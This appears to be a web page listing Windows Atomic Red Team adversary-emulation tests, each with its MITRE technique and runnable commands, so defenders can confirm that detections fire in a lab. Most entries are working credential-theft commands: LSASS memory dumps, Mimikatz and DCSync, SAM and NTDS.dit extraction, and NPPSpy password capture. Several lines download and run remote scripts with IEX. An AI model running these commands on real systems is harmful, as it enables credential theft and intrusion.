Home/Atomic Tests
Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate
Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.
filter by technique id in the URL: /atomic?technique=T1059

Matching tests · windows

400
T1001.002 powershell elevated windows Steganographic Tarball Embedding
Steganography
This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) within an image. The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball file within the image, utilizing steganography techniques for data obfuscation. This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
T1001.002 powershell elevated windows Embedded Script in Image Execution via Extract-Invoke-PSImage
Steganography
This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems. The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed. In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'  
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"
T1003 command_prompt elevated windows Gsecdump
OS Credential Dumping
Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's followed by two 32 character hashes. If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
"#{gsecdump_exe}" -a
T1003 powershell elevated windows Credential Dumping with NPPSpy
OS Credential Dumping
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
T1003 powershell elevated windows Dump svchost.exe to gather RDP credentials
OS Credential Dumping
The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
T1003 powershell elevated windows Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
OS Credential Dumping
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
T1003 powershell elevated windows Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
OS Credential Dumping
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
T1003 powershell windows Dump Credential Manager using keymgr.dll and rundll32.exe
OS Credential Dumping
This test executes the exported function KRShowKeyMgr located in keymgr.dll using rundll32.exe. It opens a window that allows to export stored Windows credentials from the credential manager to a file (.crd by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.). Reference: https://twitter.com/0gtweet/status/1415671356239216653
rundll32.exe keymgr,KRShowKeyMgr
T1003 powershell windows Send NTLM Hash with RPC Test Connection
OS Credential Dumping
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Ref: https://twitter.com/vysecurity/status/974806438316072960
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 powershell elevated windows Dump LSASS.exe Memory using comsvcs.dll
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using direct system calls and API unhooking
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
"#{dumpert_exe}"
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using NanoDump
LSASS Memory
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 manual windows Dump LSASS.exe Memory using Windows Task Manager
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
T1003.001 command_prompt elevated windows Offline Credential Theft With Mimikatz
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 command_prompt elevated windows LSASS read with pypykatz
LSASS Memory
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa
T1003.001 powershell elevated windows Dump LSASS.exe Memory using Out-Minidump.ps1
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp. Author of Out-Minidump: Matthew Graeber (@mattifestation)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
T1003.001 command_prompt elevated windows Create Mini Dump of LSASS.exe using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 powershell elevated windows Powershell Mimikatz
LSASS Memory
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
T1003.001 powershell elevated windows Dump LSASS with createdump.exe from .Net v5
LSASS Memory
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
T1003.001 powershell elevated windows Dump LSASS.exe using imported Microsoft DLLs
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
#{xordump_exe} -out #{output_file} -x 0x41
T1003.001 powershell elevated windows Dump LSASS.exe using lolbin rdrleakdiag.exe
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory through Silent Process Exit
LSASS Memory
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios; either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process, from an attacker standpoint this is appealing as their illicit credential extraction will appear benign because from a defender’s viewpoint it’s within the realm of normal activity. Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.002 command_prompt elevated windows Registry dump of SAM, creds, and secrets
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
T1003.002 command_prompt elevated windows Registry parse with pypykatz
Security Account Manager
Parses registry hives to obtain stored credentials. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa
T1003.002 command_prompt elevated windows esentutl.exe SAM copy
Security Account Manager
Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
T1003.002 powershell elevated windows PowerDump Hashes and Usernames from Registry
Security Account Manager
Executes a hashdump by reading the hashes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
T1003.002 command_prompt windows dump volume shadow copy hives with certutil
Security Account Manager
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
T1003.002 powershell windows dump volume shadow copy hives with System.IO.File
Security Account Manager
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
T1003.002 powershell windows WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Security Account Manager
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
T1003.002 command_prompt elevated windows Dumping of SAM, creds, and secrets(Reg Export)
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with vssadmin
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
T1003.003 command_prompt elevated windows Copy NTDS.dit from Volume Shadow Copy
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
T1003.003 command_prompt elevated windows Dump Active Directory Database with NTDSUtil
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with WMI
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely with WMI
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely (WMI) with esentutl
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
T1003.003 powershell elevated windows Create Volume Shadow Copy with Powershell
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
T1003.003 command_prompt elevated windows Create Symlink to Volume Shadow Copy
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with diskshadow
NTDS
This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
mkdir c:\exfil
diskshadow.exe /s #{filename}
T1003.003 powershell elevated windows Copy NTDS in low level NTFS acquisition via MFT parsing
NTDS
This test is intended to be run on a domain Controller. UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
T1003.003 powershell elevated windows Copy NTDS in low level NTFS acquisition via fsutil
NTDS
This test is intended to be run on a domain Controller. UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
T1003.004 command_prompt elevated windows Dumping LSA Secrets
LSA Secrets
Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
T1003.004 powershell elevated windows Dump Kerberos Tickets from LSA using dumper.ps1
LSA Secrets
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type. If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session. Ref: https://github.com/MzHmO/PowershellKerberos/ Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
T1003.005 command_prompt windows Cached Credential Dump via Cmdkey
Cached Domain Credentials
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe Credentials listed with Cmdkey only pertain to the current user Passwords will not be displayed once they are stored https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
cmdkey /list
T1003.006 command_prompt windows DCSync (Active Directory)
DCSync
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729)
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
T1003.006 powershell windows Run DSInternals Get-ADReplAccount
DCSync
The following Atomic will run Get-ADReplAccount from DSInternals. Upon successful execution, domain and credentials will appear in stdout. [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle. https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
Get-ADReplAccount -All -Server #{logonserver}
T1005 powershell windows Search files of interest and save them to a single zip file (Windows)
Data from Local System
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }
T1006 powershell elevated windows Read volume boot sector via DOS device path (PowerShell)
Direct Volume Access
This test uses PowerShell to open a handle on the drive volume via the \\.\ [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))): `` 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 00000000 EB 52 90 4E 54 46 53 20 ëR?NTFS ``
$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
$handle.Read($buffer, 0, $buffer.Length)
$handle.Close()
Format-Hex -InputObject $buffer
T1007 command_prompt elevated windows System Service Discovery
System Service Discovery
Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
tasklist.exe /svc
sc query
sc query state= all
T1007 command_prompt windows System Service Discovery - net.exe
System Service Discovery
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in the temp directory called service-list.txt.
net.exe start >> #{output_file}
T1007 command_prompt windows Get-Service Execution
System Service Discovery
Executes the Get-Service cmdlet to gather objects representing all services on the local system.
powershell.exe Get-Service
T1007 command_prompt windows System Service Discovery - Windows Scheduled Tasks (schtasks)
System Service Discovery
Enumerates scheduled tasks on Windows using schtasks.exe.
schtasks /query /fo LIST /v
T1007 powershell windows System Service Discovery - Services Registry Enumeration
System Service Discovery
Enumerates Windows services by reading the Services registry key (HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control Manager APIs or CLI tools such as sc.exe or Get-Service.
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
  ForEach-Object {
    $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    [PSCustomObject]@{
      Name        = $_.PSChildName
      DisplayName = $p.DisplayName
      ImagePath   = $p.ImagePath
      StartType   = $p.Start
    }
  }
T1010 command_prompt windows List Process Main Windows - C# .NET
Application Window Discovery
Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}
T1012 command_prompt elevated windows Query Registry
Query Registry
Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
T1012 powershell elevated windows Query Registry with Powershell cmdlets
Query Registry
